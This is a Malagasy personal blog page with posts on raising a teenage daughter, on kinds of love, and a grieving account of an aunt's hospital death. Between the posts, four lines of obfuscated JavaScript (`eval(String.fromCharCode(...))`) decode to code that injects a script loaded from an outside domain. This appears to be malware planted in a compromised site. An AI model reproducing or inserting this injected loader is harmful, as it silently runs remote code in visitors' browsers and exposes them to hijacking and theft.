    Na dia levona aza ny nofoko sy ny foko, dia mbola vatolampin’ny foko sy anjarako mandrakizay Andriamanitra.
  • Joba 23 , 14a :   Eny, manatanteraka izay voatendry ho ahy Izy

 

 

 

 eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


58 comments

FItaizana

Ela aho izany tsy teto,

 

Resaka rediredy @ fitaizana indray ity, mahay mitaiza ve aho?

Handray 18 taona atsy ho atsy ny zanako…..efa lehibe aho hoy izy izany foana no ambetin-teniny, inona moa no mahalaza fe lehibe ny olona iray? izaho anefa toa tsy mahatsiaro tena akory fa efa lehibe izany na dia efa mananika ny 50 taona aza, ny taona ve no hamaritana ny maha lehibe ny olona sa ny toe-tsaina sa ny toe-batany?

Fony mbola velona i neninay dia tsy nisy zavatra niafina taminy ny mahazo ahy na tsara io na ratsy,  na an-kafaliana na fahoriana, indrindra moa fa fahorian-tsaina izany, fa ny ankizy ankehitriny kosa dia mahazendana ahy fa dia izao namany izao lava hono no hifampizarany ny manjo azy, ary ny zanako manokana indray ankoatran’ny namany dia mba misy ihany koa fotoana moa natokanay hiresahana @ manaampahaizana dokotera mba hitantarany ny fiainany manokana, ka manampy azy io @ lafiny ara-batana aloha ary ara-tsaina ihany koa. Ka raha misy resaka tsy tiany ho resahana amiko dia mba milamindamin-dratsy aho fa tsy hanoro vohona azy io manam-pahaizanaa io fa anisan’ny mpanabe ihany koa ary mpitaiza, izay no asany tsinona. Tsy ahitana izany moa any @ firenentsika fa aty @ misy anay no tena ahaitana izany ka dia manararaotra mihintsy izahay mianaka noho izany, sady hitanay ihany koa fa manampy anay ilay firesahana aminy.

Tsy misakana ny fananany ny tsiambaraa-telokeliny anefa izany raha aminay mianaka maanokana, fa hafa ihany ny sain-dreny tia hahafantatra ny zava-drehetra miseho @ fiainan-janany, izay aloha ny aahy fa ny anareo no tsy haiko, sa ve izaho no zatra nahatrizao aza mitantara ny rehetra miseho @ fiainako @ i neninay???

Hatreo indray aloha ny @ iny fa tsy ho voavahako ity olana ity……eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


24 comments

Fitiavana

Misy amintsika ve tsy mbola nitia? ataoko fa tsy misy izany…… raha mbola nateraka ihany dia misy izany fitiavana izany fa mety hoe modiana tsy henoina, na ampanginana ngamba raha mihaino sy mijery ny vaovao maneran-tany @ izao fotoana izao isika….

 

Ny fitiavana dia tsy ho voatery ho foafaritra ho atokana amin’olon-tokana ihany, azo atao tsara ny mitia olona maro fa tsy mitovy kosa ny tsapa amin’izy tsirairay avy. Misy ambaratongany ihany koa izy io, ambarako aminao anie e!

Ny fitiavana ny ray aman-dreny aloha raha mbola kely ny zaza, satria dia ireo no nahitany masoandro, nahitany ny tsimbok’aina, ahafahany hirehareha eto an-tany. Azo ampidirina ao izany ny fitiavana ny mpiray tampo, satria dia iray aina iray vatsy ireo.

Manaraka indray dia ny fitiavana ny mpiara-belona: satria dia ireo no mpanabe voalohany, sy hifaneraserana voalohany ihany koa, ny fiaraha monina indrindra no sokajiako eto ary azo atao anatin’izany ny fiangonana sy ny toeram-piasana.

Eo ihany koa ny fitiavan-tena, satria nahoana hoy ianao? raha tsy tianao aza ny tenanao sy ny maha ianao anao, ahoana moa no hitiavanao ny manodidina anao? Somary sarotra ihany anefa izany satria dia eo @ fitaizana hatrany @ fahazazana no zarina ho tia tena nefa tsy ho diso tafahoatra ihany koa isika….. Ahoana moa izany? Fitiavana toy ny rehetra ihany izy io saingy miavaka kely, eo no ataon’ny vazà hoe ‘estime de soi’ ihany koa. Mahalaza zavatra betsaka izany, milaza ihany koa fa hainao ny mandanjalanja ny fitiavana omenao sy raisinao avy @ olona manodidina anao, na @ toetra izany na @ asa vita izany….Io fanomezan-danja ny fitiavanao io ihany koa dia ahafahanao manome ambaratongam-pitiavana ny olona mifanerasera aminao, tsy ho voatery tiavina daholo akory ny olona rehetra….

Ary raha hiditra @ fitiavan’olon-droa indray isika dia mmhh, misy ambaratongany izy io. Misy anefa olona  ao anatin’ny androm-piainany dia tsy handalo izany ambaratonga rehetra izany fa mety ho ny 1 na ny 2 @ izay fotsiny ihany, fa rehefa miaina anaty fitiavana dia izay no izy e!

Tsy tokana hoy aho teo ambony ny fitiavana, ary tsy hitovy na oviana na oviana ny hitiavanao olona tsirairay avy, tsy hoe akory izany dia misy ny fiangarana eo @ fitiavan-janaka sanatria ho an’ny ray aman-dreny fa ny fanehoana izany fitiavana izany kosa no tsy mitovy.

Raha eo @ olon-droa ihany koa dia misy ambaratongany izy io:

  • Ny Fitiavana miredareda: mmhh iza t@ mpifankatia no tsy mbola niaina io?? toa zary ziona ny manodidina fa tsy misy afatsy izy roa irery no ety an-tany. Ny tsara ho fantatra anefa dia tsy maharitra io fahatsapana fitiavana miredareda toa afo io fa miserana ihany, mety ho 1 taona na 1 volana fa an’ny tsirairay moa iny… mankaleo ny miaraka miresaka amin’olona ao anatin’io fitiavana io ann, satria dia tsy misy afatsy izy 2 no ambetin-dresaka hihihi.
  • Ny Fitiavana mambabo-fo: izany hoe tsy misy afatsy izy 2 ihany tsy mila olon-kafa ry zareo, mihidy ao izany izy, tsy manaiky ny fidiran’ny hafa à resaka ataony na ny fiainany akory ……ohatra hoe miaraka mifanjohy eny foana, miantsena, manao fanatanjahan-tena, na miaraka mivoaka fa tsy mba misy fotoana hoe iny eny i ramose fa mandeha irery na koa i madama fa mba niaraka niantsena t@ namany, tsy haindry zareo izany izay e!
  • Ny Fitiavana mahafatifaty ilay feno angolangola iny: eto indray dia mazàna olona efa somary nandia fiainana no ahitana azy, efa tsy ao intsony ilay fitiavana naha taitaitra tany am-boalohany nefa tsy maty ihany koa na tsy azo atao koa nefa hoe miredareda…. mitady antoka ny roa tonta, izany hoe efa eo @ rotorotom-piainana sy fitiavana ka mitady toerana tsara amaharana.
  • Ny Fitiavana miaro ady: misy amintsika ngamba mahafantatra olon-droa tsy ialan’ady nefa dia indreny mifanjohy eny ihany fa tsy mahasaraka, dia izay ilay izy. Tsy hoe tsy tiana akory ilay olona ialàna ady.. tsia… fa zary fomba fiaina ilay izy.
  • Ny Fitiavana ara-nofo: mmhhh tsara be izany, ary izay no tena izy, tsy ampy anefa raha izay ihany no ataao lafika hanorenana tokan-trano. Tsy misy maha menatra io fitiavana io nefa kosa tsy ampy, azo atao tsara ny manampy azy @ filàna hafa iarahan’ny mpivady.
  • Ny Fitiavana  nofisina: izay eritreretina mafy ho tanteraka, tsy misy fifampikasohana ara-batana mihintsy fa dia ara-tsaina sy valan-dresaka no betsaka aloha. Mety ho hita izany eo à olon-droaa miara miasa ohatra, izay io asa io no ifantohan’ny fiainan’izy roa manontolo, na koa hoe miaraka manao fanatanjahan-tena na miaraka mivoaka any à tranom-boky dia efa mahazo fahafinaretana à izay ilaay olona anankiroa dia ampy ho azy ireo izay, raha tsy mitandrina anefa ry zareo dia mety ho ritra tanteraka ny fitia ary ho tonga à fisarahana izany.
  • Ny Fitiavana diso fatra: na koa hoe diso mihoa papana loatra, izany hoe lasa misy fandeferana eo à ankilany ary fanomezana vahana ny an-kilany kosa ilay fitiavana, mandeha ila ny mizàna eto. Lasa manadino ny tenany mihintsy aza ilay olona eto fa lasa hoe miaina ho an’ilay silany……mahalasa saina ihany nefa dia misy tokoa izany… manao sorona ny tenany izany.

Misy ihany koa anefa ireo mpifankatia tsy miaraka mitoetra fa samy manana ny ankaniny, toa zary lasa fiainana izany ankehitriny satria mahaleo tena ny tsirairay avy, ireo voatanisako eo ambony akory tsy midika fa tsy misy fahaleovan-tena ara-bola ny tsirairay an, tsia fa ireo ambony ireo dia miara-monina ny mpifankatia. Amin’ity sehom-pitia ity dia efa olona matotra no mampiasa azy, sy miaina azy, satria mila fahatokisana 100% eo @ ankilany aavy izany, tsy hoe akory rehefa tsy iray trano ihany no atao hoe mpifankatia, misy ny tokan-trano miaina tahaka izao, ary mateza sy maharitra satria misy tokoa ny fifanajana eo à roa tonta. Tsy hoe akory tsy misy fifanajana @ iretsy eo ambony fa ity seho ity dia miavaka satria tsy miaina afatsy ny lafi-tsarany ny mpifankatia, na misy aza ny lafi-ratsiny dia ezahin’izy ireo ho ny tsara hatrany no hihaonany…..

 

Raha misy azonareo anampiana ny voasoratro dia aza misalasala fa tsy nandalina io aho akory fa mba namakivaky boky teny dia hitako nisongadina ireo ary tsy aritro ny nizara azy taminareo.

Misaotra.

 

 

 

 eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


19 comments

Lasa i Solo e!

Dia tsy hanoratra ve raha tsy hilaza manjo foana izao e! ggrrr inona ary ity tsss

 

Dia akory atao fa dia lasa very namana iray indray izahay aty Lille aloha…… tsy iza moa izany fa i ‘Solo’ izay nenitoako moa izany raha ny rohim-pihavanana no zohiana misy eo aminay nefa dia tsy tena tahaka izay ny fifampitondranay fa tahaka ny mpirahavavy ihany, ary raha taminy sy i Maeva zanako kosa dia tahakan’ny zaza mifanarakaraka izy miafy fa tsy mba nisy ambaratonga teo @ izy ireo.

Somary efa narary ihany izy volana vitsivitsy lasa izay ary nitarika tsy fahafahana miasa izany… Ny alarobia 23/09/2015 izahay dia mbola niaraka niantsena ary tsy dia hitako loatra nisy fiovana izy akoatran’ny hoe tsemboka be izy nefa dia niteny ahy fa tsy maninona loatra fa mbola mikohaka sy mbola misy hafanana aloha @ ilay ngamba misy tazo fa efa nahazo fanafody aloha…, tsy nety nateriko hatrany an-trano izy fa niakatra irery niaraka t@ entany. Izaho moa rehefa maka azy hiantsena dia miantso azy an-tsofin-davitra dia midina izy ary miandry ahy tonga @ fiara aty ivelan’ny trano, ary mazàna rehefa avy miantsena izahay dia tsy mamela ahy hiakatra izy fa tateriko hatreo @ ascenseur ny harona dia iny aho no miverina mody…dia tsy niova t@ izay ny nataonay farany…. indrisy…. tokony niakatra aho….

Ny zoma sy sabotsy manaraka an’io izy dia niantso ahy ary somary nitaraina fa vizaka fa niteny azy aho hoe, mihinana voankazo @ ireny niantsenana ireny fa mila vitamines ianao, sns , ary mila misakafo tsara ihany koa…. efa mihinana aho hoy izy fa ohatran’ny mahatsiaro vizana izany. Tokony nandeha notiliana rà ihany koa izy fa tsy nandeha fa vizana hono ary niantso infirmière ho avy ary @ talata 02/10/15 ny fotoana nomen’io, tokony natao radio ihany koa ny kibony lazainy fa maharary azy fa efa nahazo ordonnance ny @ izay izy fa mbola nangatak’andro ny ho any fa tsy mahavita mandeha hono, dia somary notezerako moa hoe ka maninona no tsy manontany ahy?????; dia teo vao nifandamina ny @ fotoana izahay, ny alatsinainy maraina izy niantso ahy fa tena tsy zakany ny fanaintainana manjo azy @ tongony fa dia mianjerazera foana izy….. Nilaza taminy aho fa ny hariva aho vao malalaka ny ho any fa mbola nisy RDV t@ sekolin’i Maeva.

Nony tonga aho ny hariva tokony ho tà 17h teo ho eo dia tsy tafiditra ny trano (satria aho manana ny fanalahidy ihany koa) dia voatery niantso azy hamoha ahy, tsy henony anefa ny sonnerie, dia nantsoiko t@ finday izy, ary naharitra 5 minitra izy vao tonga namoha varavarana ahy, ary nandritra izay dia in 2 nianjera t@ tany izy, nolazaiko moa izy hoe aza miezaka mitsangana fa mandadiza……

Nony nivoha ny varavarana dia gaga aho nahita azy tsy mahatsangana, ary tonga aho dia niantso ny mpitsabo azy… rehefa tafaresaka taminy aho dia niteny io farany io fa tonga dia mila ampidirina hopitaly maika izy. Rehefa avy niantso ambulance aho dia niteny ity farany fa mila mandoa 70e aho sarany satria tsy manana bon de transport izahay, tsy nanaiky anefa aho fa niverina niantso ny mpitsabo indray ary nangataka io taratasy io, tsy ny mpitsabo anefa no azoko fa ny secretaire ny ary tsy nety hanome ahy hiresaka @ mpitsabo ity farany fa efa niresaka ela hono izahay teo nefa ny olona betsaka no miandry azy ao, ka tsy afaka ny hanome ahy alalana hiresaka @ mpitsabo izy, nolazaiko azy fa mila ttsy ahafahako maka ambulance fotsiny aho dia, eny hoy izy rahampitso izay azonao, tsia hoy aho izao dieny izao ny nolazain’ny mpitsabo teo, narirarirany teo aho fa tonga dia nitongavako tany izy ary azoko ihany ilay ttsy ary niantso ilay ambulance aho dia niaraka tonga izahay.

Nony tonga tany @hôpital izahay dia tonga dia tany @ zone4 n’ny urgence no nampidirana azy izany hoe tena faran’ny maika indrindra, nametrahana fanontaniana maro aho, tahakan’ny hoe: ngah avy nivahiny tany afrika izy, sns…. naharitra ela ny fitiliana tao, natao ny fangalàna rà ny echographie reins sy abdomen,  fa tsy nahitandry zareo inona!!!! nony efa nandroso alina ny andro tokony ho t@ 1 ora maraina teo dia nafindra toerana ho any à déchocage manuel izy ary dia nasaina nody aho fa tsy misy azoko atao eo tsinona.

Nony maraina tokony ho t@ 7h30 teo ho eo dia naneno ny findaiko ary dokotera no tao nanontany ahy hoe aiza ho aiza ny misy ahy….. efa akaiky eto aho hoy aho, fa mametraka fiara dia tonga… miandry anao ary aho hoy izy…., nony tonga aho dia nasaina niandry tao à efitra iray fa hisy mpitsabo hiresaka amiko. Niandry ela tokoa aho satria efa t@ 10 ora mahery tany vao nisy dokotera tonga niresaka tamiko, nanazava ny toe-draharaha…… izaho moa nandritra izay dia nitsanga-nitoetra nijery nanarangarana tety alavitry ny varavarana izay tsy azoko nidirana, izay ahitako irika kely monja ny efitrano nasiana an’i Solo. Nilaza sy nanazava aza io mpitsabo io fa mila fandidiana maika izy fa misy tritra ny aorte izay lalandrà mitondra ny rà mankany à vatana ary tsy afaka ny mankany @ reins sy ny tsinay intsony izay ary dia nahafaty ny reins anankiray ary tsy namelona ny tsinay ihany koa ka lasa mangana ‘nécrosé’ ny tsinainy ary tsy maintsy ho esorina ny simba @ izany, nambarany ihany koa fa ho sarotra ny fandidiana fa mety tsy hifoha @ izany izy nefa mahatoky ny mpandidy isika…..tankina tsy nahateny aho…. ny voalohan’ny tonga tao an-tsaiko dia ny hiantso an’i Tonton Pasy, haka hevitra sy hanoro ahy ny tokony hataoko……i tatie Caro moa no azoko ary nilaza fa hampita ny hafatra, teo no eo moa dia niantso ahy izy, ary niresaka izahay mianaka, nazavaiko azy ny nolazain’ny dokotera tamiko………, ilay dokotera moa mbola niteny ahy fa ho avy hijery ahy ny mpadidy hanazava izay hataao aminy, dia niandry aho ka niandry ary nivezivezy nanoloana ilay varavarana tsy azo hidirana foana, tsikaritr’ilay dokotera niresaka tamiko izany ary nanontany ahy izy raha efa taharesaka tà mpandidy aho, novaliako fa tsy mbola….. dia tonga dia nolazainy aho hiditra haingana ny efitre misy an’i Solo sao ho tara hoy izy fa efa nidina any @ bloc izany ny mpandidy fa sao tara loatra raha mbola hiresaka aminao…..dia akory ny hatairako nahita azy feno milina manodidina azy sy aminy…. fa mody tsy taitra aho satria hitako ny masony manaraka ahy ihany, ny mason’i Solo io, dia mbola nivazivazy taminy aho hoe mahay ny mpitsabo fa tsy misy atahorana fa mbola miverina ianao avy eo fa tsy mijanona any ambany any fa maika aho annnn, sns….. dia izy mamaly ahy moa hoe an an, @ vavany fa tsy afaka miteny intsony izy fa efa misy tube ny vavany, miresaka à maso izahay ary fantatro faa natahotra izy, nolazaiko izy fa miaraka @ Tompo hatrany isika ka tsy misy manahy ny @ izay hitranga, nitsiky izy…….. dia nony afaka 10 minitran’ny firesahanay teo dia nolazaina @ izay aho fa tsy maintsy mandeha ry zareo fa efa miandry ny mpandidy….. dia mbola nanofahofa tanana azy aho…….izy mbola afaka naninga ny rantsan-tanany……… dia izay….

Nidina ny bloc izy tokony ho t@ 14h teo ho eo ary tsy niala tany raha tsy t@ 21h30 tany ho any.

Izaho moa nony nidina izy dia nasaina nody fa tsy navelandry zareo nijanona teo satria tsy fantatra hafiriana ny faharetan’ny fotoana fandidiana…., nolazaiko azy ireo moa fa misy fotoana tsy azo iodivirana aho ny hariva ka avy any aho vao tonga…… I maeva no niantso ilay laharana nomena ahy nanontany ny fizotran’ny fandidiana ka izay no nahafantarana fa t@ 21h30 izy no tafavoaka ny bloc, tokony ho t@ 21h45 teo i Maeva no niantso ny tany fa efa tsy ariny intsony hono hoe tsy misy miantso izahay…. avy teo moa izy niantso ahy dia tonga aho dia nandeha tany @ hopitaly tokony ho t@ 22h30 tany ho any. Nony tonga tany anefa aho dia nolazaina anay fa niova toerana izy fa tsy ao @ déchocage manuel intsony fa any @ déchocage chirurgicale indray, dia nazavaina anay teo ny lalana mankany dia lasa izahay sy José nandeha tany.

Rehefa tonga tany izahay dia tsy tonga dia nahazo niditra fa mbola nazavaina taminay ny natao taminy, izany hoe nesorina ny rein anankiay ilay maty ary nesorina ihany koa ny 3M t@ tsinainy, raha manana 4M @ tsinay isika olombelona, nolazaina taminay fa tsy afaka miaina tsy misy tsinay isika olombelona ka noho izany dia najanona ny 1Metatra ary dia ho jerena @ fandidiana manaraka raha hihaina io na tsia, fa raha sanatria tsy miaina io ao anatin’ny 24H na 48H taorian’io fandidiana voalohany io dia tsy ho fohazina intsony izy……. tankina tsy nahateny aho……… manamboatra saina miandalana ihany koa aho,…

Nahita azy ary izahay……. mila miomana moa rehefa hiditra ny efitra misy azy, izany hoe misasaa tanana tsara @ savony sns, mba tsy hitondra mikroba…. dia akory ny fahatairana fa dia mody tony ihany e!!! milina tsy milina re izao e!!!! fa dia jerena hoe miaina izy dia mionona fa hoe mbola velona izany…..

Niandry ny fandidiana faharoa izany dia natao io ny alakamisy, rehefa avy nazavaina tamiko ny tokony hatao azy, dia ny hoe hitondra poche izy, ary mila ahy eo aaminy hikarakara azy rehefa hivoaka ny hopitaly izy, tsy nanisy olana ny @ izany aho fa tonga dia nekeko. Nidina ny bloc indray izy tokony ho t@ 9h maraina ary tsy niakatra raha tsy t@ 12h30-13h tany ho any, niandry azy tao moa aho satria niasa hariva aho io alakamisy io, niandry azy ny hifoha à izay satria tokony hifoha izy taorian’io fandidiana faharoa io. Tsy mbola nifoha anefa izy talohan’ny niaingako tany, ary dia tsy nistahatry ny niantso aho taty am-piasana mandra-piveriko tany indray ny alina…..tahaka izay ihany koa ny zoma, tsy niasa aho moa fa tany tontolon’andro, niteny ahy ny mpitsabo fa raha tsy mifoha izy dia ny alatsinainy dia hanao scanner/irm ry zareo ahitana ny tsy mety aminy, satria nandritra izay dia natao dialyse izy moa izany, nolazaina ahy ihany koa fa misy olona sasany maharitra vao afaka aminy ny tahan’ny fanafody fampatoriana ampiasaina mandritran’ny fandidiana. Nandritra izay fotoana izay moa dia tsy tapaka aho no miresaka à dadatoa Pasy manome vao² azy, izy rahateo koa efa tafaresaka t@mpitsabo azy, ny sabotsy izy no nandalo nijery azy tany @ hôpital niaraka t@ i Titsy sy Raivo ary i Hoby, nitsodika azy koa i Tiana, i Nanick sy Vavah moa nijery azy ihany koa, tsy adinoina ny mpiara mivavaka tao @ FPMA izay tsy nitandro hasasarana tokoa nifandimby niandry azy teny @ hopitaly, ary indrindra koa i Pastera Miora, izay zoky ray aman-dreny tokoa, nitrotro azy am-bavaka sy nitarika fivavahana ho azy ihany koa….

Tonga ny alatsinainy, izaho moa niasa maraina ka tsy afaka tonga tany fa tsy mitsahatry ny miantso aho nanontany hoe efa nidina natao scanner sns veh , nidina tokoa izy tokony ho t@ 8h-9h teo ho eo, dia niverina niantso aho tokony t@ 11h30 tany ho any nanontany ny valiny, fa nolazaina ahy fa mbola tsy azo izany, namerina niantso aho t@ 15h satria efa hirava, dia nolazaina fa tsy mbola ao aloha. Nambarako aza fa manana rdv any @ kiné aho ka somary ho tara kely vao ho avy, tsy misy olana ny @izay hoy izy fa ndana fa avy eo miandry anao aho hoy ilay mpitsabo azoko…..

Nony efa akaiky ilay toerana hanaovako kiné aho dia naneno ny findaiko ary ilay mpitsabo vao azoko vao teo no teo, nilaza izy fa tsaratsara kokoa raha tonga any izao dieny izao aho raha azo atao satria efa minitra na ora vitsy sisa ahafahako mahita an’i ‘tante’ nao hoy izy, saika tsy hitako ny lalana nombana fa tonga dia nahodiko ny familiana ary nirifatra aho nitodi-doha ho any @ hôpital teny an-dalana aho dia niantso an’i Dolly hiaraka amiko fa matoa ny mpitsabo miantso dia efa tsy izy intsony izay hoy aho, niantso an’i Haja ihany koa aho. Nony tonga aho dia nasaina niditra tahaka ny mahazatra ary nolazaina fa ho avy ny mpitsabo……. ora 1 taty aoriana dia tonga izy ary niteny tamiko fa afaka mankao @ bibliothèque @ izay izahay fa hiresaka, nanaraka azy aho, fa nony tonga tao @ couloir dia iny i Dolly sy Manitra ary i Lydia (Max) sy Liva ary Pastera niaraka nivoaka avy tany, tonga dia nasaiko niaraka niditra niaraka tamiko ry zareo, rehefa vita ny fifampahafantarana anay, dia nandray fitenenana ny mpitsabo, nilaza izy fa novoriana izahay fianakaviana satria nivaly ny scanner natao ny maraina ary hita fa ‘tsy misy activité cérébrale’ intsony izy, tahaka ny mahazatra moa rehefa misy valan-dresaka ataoko @ mpitsabo dia efa mivonona @ ttsy sy stylo aho handray note, fa teo dia tankina aho tsy hitako izay nosoratana, tonga dia dia latsaka tety an-tanako ny stylo ary nofihiniko sy nopotseriko mafy ny tanan’i Manitra sady mbola naka toky t@ mpitsabo aho nanontany hoe inona tsara ny dikan’izany????? dia hoy izy namaly ahy hoe…. ‘elle est morte’…… tsy fantatra hoy izy na ovina na ovina izy no maty na t@ fandidiana voalohany fa taorian’io na t@ fandidiana faharoa na taorian’io fa tsy misy asa intsony ao anatin’ny lohany,…. lasa izy izany……..tankina aho……… efa nitsabo isika hoy izy ary izay ny namindrana azy taty satria mbola tanora izy fa raha ny fahitana azy hatrany am-boalohany raha olona efa voky andro izy dia tsy notohizanay akory 